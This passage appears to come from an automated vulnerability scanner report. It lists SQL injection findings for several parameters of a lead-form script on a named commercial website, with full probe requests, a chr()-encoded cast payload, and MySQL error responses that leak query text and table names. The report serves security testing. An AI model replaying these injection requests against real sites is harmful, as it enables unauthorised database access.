Set-Cookie: PHPSESSID=vtk0nqnq6f4jleesejhgg63501; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '999&attributeId_427=2775__One-time campaign&attributeId_428=2779__Immediately&bu' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses''&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1s57o6q1d1tiep3kdur8hbqn25; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.258. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_426 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_426 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_426 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999'&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nos6j8soc6t3nsdeq0262lo6f2; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Na' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999''&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qj3kfhck31vung0jpu1ll37pv4; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.259. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_427 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_427 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_427 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign'&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mf01fkubja0qdjhd4cbpeg89o3; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign'&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign''&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mii1ibhove6per37coafki9nh3; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.260. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_428 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_428 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_428 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gs5r57etgpptael4lvkf7ig0k2; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=91l9ud7s3d1bggt7sv0800v921; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.261. http://www.insideup.com/ppc/leadflow/dima00/project.php [button3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8i5n2lufivf1rmhj0feope34h5; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o7da6u3nsjltj3b9kkpd9dnr34; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.262. http://www.insideup.com/ppc/leadflow/dima00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)'&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gfoij67bsuue9jipj1n0262lt6; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)''&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:51:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6d84gst0ve848d25vq3c097431; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.263. http://www.insideup.com/ppc/leadflow/dima00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=glks59t1d43h7gugds5vh2usc5; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4ltspoajte8hfcholsneqvs3h2; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.264. http://www.insideup.com/ppc/leadflow/dima00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

